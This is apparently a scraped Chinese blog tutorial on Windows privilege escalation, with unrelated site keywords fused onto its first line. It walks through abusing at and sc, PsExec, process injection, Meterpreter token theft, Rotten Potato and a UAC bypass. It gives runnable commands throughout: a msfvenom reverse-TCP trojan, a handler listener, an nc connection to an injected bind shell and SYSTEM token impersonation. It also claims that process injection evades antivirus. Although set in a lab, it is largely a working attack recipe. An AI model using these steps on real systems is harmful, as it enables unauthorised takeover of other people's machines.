文网站建设,网站建设需求说明书,工程公司取名大全,中国最大网站排名Windows权限提升—令牌窃取、UNC提权、进程注入等提权1. 前言2. at本地命令提权2.1. 适用范围2.2. 命令使用2.3. 操作步骤2.3.1. 模拟提权2.3.2. at配合msf提权2.3.2.1. 生成木马文件2.3.2.2. 设置监听2.3.2.3. 设置反弹2.3.2.4. 查看反弹效果3. sc本地命令提权3.1. 适用范围3.…
Windows权限提升—令牌窃取、UNC提权、进程注入等提权1. 前言2. at本地命令提权2.1. 适用范围2.2. 命令使用2.3. 操作步骤2.3.1. 模拟提权2.3.2. at配合msf提权2.3.2.1. 生成木马文件2.3.2.2. 设置监听2.3.2.3. 设置反弹2.3.2.4. 查看反弹效果3. sc本地命令提权3.1. 适用范围3.2. 命令使用3.3. 操作步骤4. ps提权4.1. 适用范围4.2. 下载链接4.3. 命令使用4.4. 操作步骤4.4.1. 下载psexec.exe工具4.4.2. 执行psexec.exe工具5. 进程迁移注入提权5.1. 前提条件5.2. pinjector.exe进程注入5.2.1. 下载链接5.2.2. 使用命令5.2.3. 操作步骤5.2.3.1. 列出所有进程5.2.3.2. 绑定进程5.2.3.3. 连接进程5.3. MSF进程注入5.3.1. 查看进程5.3.2. 迁移进程6. 令牌窃取提权6.1. 注意事项6.2. MSF令牌窃取提权6.3. 烂土豆提权6.3.1. 烂土豆提权原理6.3.2. 适用版本6.3.3. 下载链接6.3.4. 操作步骤6.3.4.1. 注意事项6.3.4.2. 使用烂土豆提权7. MSF自动化提权7.1. getsystem提权7.1.1. getsystem原理7.1.2. 提权操作7.2. uac提权7.2.1. 提权操作7.2.1.1. 确认getsystem无法提权7.2.1.2. 搜索uac7.2.1.3. 使用uac1. 前言 在之前的文章中已经对Windows的权限提升进行了介绍这里同样不再赘述如果想要去了解Windows权限提升可以看以下的文章同时也将Windows权限提升其它的几种办法也放在下面的文章中。 同时本来应该还写一篇第三方全家提权的但是在实际测试过程中发现有些第三方提权如果在电脑上都会自动更新比如向日葵低版本的直接无法连接向日葵官方的服务器那么提个毛权限的啊。 Windows权限提升—溢出提权 Windows权限提升—MySQL数据库提权 Windows权限提升 —SQL Server/MSSQL数据库提权
2. at本地命令提权 at 是一个发布定时任务计划的命令行工具语法比较简单。通过 at 命令发布的定时任务计划 Windows 默认以 SYSTEM 权限运行。
2.1. 适用范围 at本地命令提权主要是用于在Windows2000、Windows 2003、Windows XP 这三类系统中我们可以轻松将 Administrators 组下的用户权限提升到 SYSTEM。 其它系统已经不支持提权了。
2.2. 命令使用
语法at 时间 命令
例子at 10:45PM calc.exe2.3. 操作步骤
2.3.1. 模拟提权 这里可以模拟一下操作提权使用2003系统设定一个定时任务设定10:45分启动cmd .exe这里可以通过添加“/interactive”开启界面交互模式。 通过执行定时任务后就会提升权限。
at 10:45 /interactive cmd2.3.2. at配合msf提权 可以在msf下生成一个木马文件然后在shell交互中设置at命令进行执行程序上线后即为system权限。
2.3.2.1. 生成木马文件 通过命令生成一共木马文件然后将这个木马文件放入2003中去执行这里其实就是模拟在上传webshell后上传后门木马文件然后执行木马文件只是这里为了方便节省了直接上传一个木马即可。 至于运行木马就不演示了。
msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.10.20 LPORT4444 -f exe shell.exe2.3.2.2. 设置监听 这里设置一个监听用于接收反弹回来的shell。
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.10.20
set LPORT 4444
run2.3.2.3. 设置反弹 这里在接收到msf木马反弹回来的shell后进入shell后执行下面的命令。
at 11:11 C:\111\shell.exe2.3.2.4. 查看反弹效果 通过另外再启动一个监听端口的来查看新反弹回来的权限是什么可以看到到11点11分的时候执行shell.exe反弹回来的就是system权限。
getuid3. sc本地命令提权 sc是用于与服务控制管理器和服务进行通信的命令行程序提供的功能类似于控制面板中管理工具项中的服务。
3.1. 适用范围 网上说在windows 7/8Windows server2003、2008、2012、2016上都能使用这里的都能只适用于sc这条命令本身。 而利用sc进行提权通过测试目前好像只有2003可以。
3.2. 命令使用
sc Create systemcmd binPath cmd /K start type own type interact #其中systemcmd是服务名称大家可以随意填写binpath是启动的命令typeown是指服务这个服务属于谁typeinteractcmd/k start 这个命令这个命令就是启动一个新的cmd窗口。
sc start syscmd ###启动服务3.3. 操作步骤 这里就是先执行第一条命令然后在执行第二条命令即可这里我执行失败是由于我之前已经测试过了正常情况下应该是第一条命令执行后显示成功。第二条就是这样的这不不受之前测试的影响。 4. ps提权 pstools是微软官方工具是为windows提供的第三方工具库。
4.1. 适用范围 在Windows server 2003/2008/2012/2016中测试都是能用的在Windows 7/8/10由于需要调用服务而个人主机通常没有这类服务所以就会出现调用失败的情况。
4.2. 下载链接 PsTools
4.3. 命令使用
psexec.exe -accepteula -s -i -d cmd.exe ##前面的psexec.exe是工具包中的工具4.4. 操作步骤
4.4.1. 下载psexec.exe工具 通过页面上的下载tool工具集合在压缩包中找到psexec.exe工具。 4.4.2. 执行psexec.exe工具 将psexec.exe工具上传至需要提权的系统中然后执行命令。 5. 进程迁移注入提权 进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中这样就实现了权限提升同时注入进程提权相当于开启了一个后门 隐蔽性极高不会创建新的进程很难发现。
5.1. 前提条件 这里如果使用的是web权限是无法执行的必须获取到类似与administrator的权限才能进行进程注入。同时这类提权是不会被杀毒软件拦截的这是系统的一种特性。
5.2. pinjector.exe进程注入 pinjector工具实现进程注入这里需要先下载工具然后将工具上传需要提权的系统中即可。
5.2.1. 下载链接 pinjector工具
5.2.2. 使用命令
pinjector.exe -l ##列取所有进程
pinjector.exe -p pid cmd port ##选择一个system权限运行的进程对此pid进程执行注入并建立侦听端口5.2.3. 操作步骤
5.2.3.1. 列出所有进程 这里通过命令查看所有进程的权限。 5.2.3.2. 绑定进程 通过使用命令将权限绑定至system权限的进程中这里选在进程最好绑定系统进程这样能够实现开机自启。 5.2.3.3. 连接进程 这里使用kali设置个nc连接一下即可。
nc -nv 192.168.10.200 55555.3. MSF进程注入 首先需要生成一个木马然后让其上线并连接上去这里我就用之前已经生成好的木马就不再生成了在上面也提到过MSF生成木马的命令。
5.3.1. 查看进程 在反弹回来的界面输入命令然后查看所有进程已经相应的权限。
ps ##查看进程5.3.2. 迁移进程 使用命令将进程迁移进拥有system权限的进程中通过迁移后再执行命令就可以看到权限已经提升为system了。
migrate PID 迁移进程这个pid是你选择进程的id号6. 令牌窃取提权 令牌(token)是系统的临时秘钥相当于账号和密码用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下访问网络和系统资源这些令牌将持续存在于系统中除非系统重新启动。令牌最大的特点就是随机性不可预测黑客或软件无法猜测出令牌。 而令牌窃取就是通过假冒一个网络中的另一个用户进行各类操作。
6.1. 注意事项 不能保证所有的服务器都能实现令牌窃取比如我使用Windows server 2003服务器的时候就没出现NT AUTHORITY\SYSTEM而没出现NT AUTHORITY\SYSTEM就无法提权到system权限。
6.2. MSF令牌窃取提权 首先需要将木马上传至需要提权的服务器中然后执行命令进行令牌窃取提权。
use incognito
list_tokens -u #列出有的令牌
impersonate_token NT AUTHORITY\SYSTEM #窃取system令牌6.3. 烂土豆提权
6.3.1. 烂土豆提权原理 烂土豆(Rotten Potato) MS16-075 提权是一个本地提权只针对本地用户不支持域用户。 欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端对这个认证过程使用中间人攻击NTLM重放为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户IIS、MSSQL等有这个权限大多数用户级的账户没有这个权限。
6.3.2. 适用版本 Windows 7/8/10Windows server 2008/2012
6.3.3. 下载链接 烂土豆ms16-075
6.3.4. 操作步骤 这里首先需要将烂土豆工具给上传至需要提权的机器中然后进行执行。
6.3.4.1. 注意事项 这里网上的教程需要先查看一些条件我个人的理解是不如直接进行提权能成功则能成功不能成功那就是不能成功且在现实的环境中很多提权都会遇到问题。
6.3.4.2. 使用烂土豆提权 首先执行potato.exe程序然后再去加载incoginto功能其次列出目标机器可窃取的令牌然后在进行窃取。
execute -cH -f ./potato.exe ##执行烂土豆程序
use incognito ##加载窃取功能
list_tokens -u ##查看可窃取的令牌
impersonate_token NT AUTHORITY\SYSTEM ##使用令牌7. MSF自动化提权 这个提权其实很简单这个MSF自动化提权和之前在溢出提权中提到的自动化提权是不一样的溢出提权中提到的自动化提权是通过比对补丁信息进行提权而这个是自动化提权是直接输入命令后MSF自动执行只会显示提权成功与失败。
7.1. getsystem提权
7.1.1. getsystem原理
getsystem创建一个新的Windows服务设置为SYSTEM运行当它启动时连接到一个命名管道。getsystem产生一个进程它创建一个命名管道并等待来自该服务的连接。Windows服务已启动导致与命名管道建立连接。该进程接收连接并调用ImpersonateNamedPipeClient从而为SYSTEM用户创建模拟令牌。
7.1.2. 提权操作 这里和其它都是一样的首先需要将木马连接上msf然后输入命令进行提权。
getsystem ##自动化提权7.2. uac提权 UAC(User Account Control用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前提供权限或管理员密码。 也就是说一旦用户允许启动的应用程序通过UAC验证那么这个程序也就有了管理员权限。如果我们通过某种方式劫持了通过用户UAC验证的程序那么相应的我们的程序也就实现了提权的过程。
7.2.1. 提权操作
7.2.1.1. 确认getsystem无法提权 这里在反弹回来的时候测试一下getsystem是否无法提权。 7.2.1.2. 搜索uac 这里先搜索uac因为这里面有些uac可能对不同的系统会有不同的作用。
search uac ##搜索7.2.1.3. 使用uac 这里我们使用的是Windows7那么我们就使用exploit/windows/local/ask来执行。
use exploit/windows/local/ask ##选择模块
sessions ##查看后台进程
set session 1 ##选择进程
set lport 5555 ##设置监听端口有时候返回回来会出现错误所以就另起一个监听。这里查看一下监听看看返回的权限然后在返回的权限中再次使用getsystem发现能够提权到system权限。
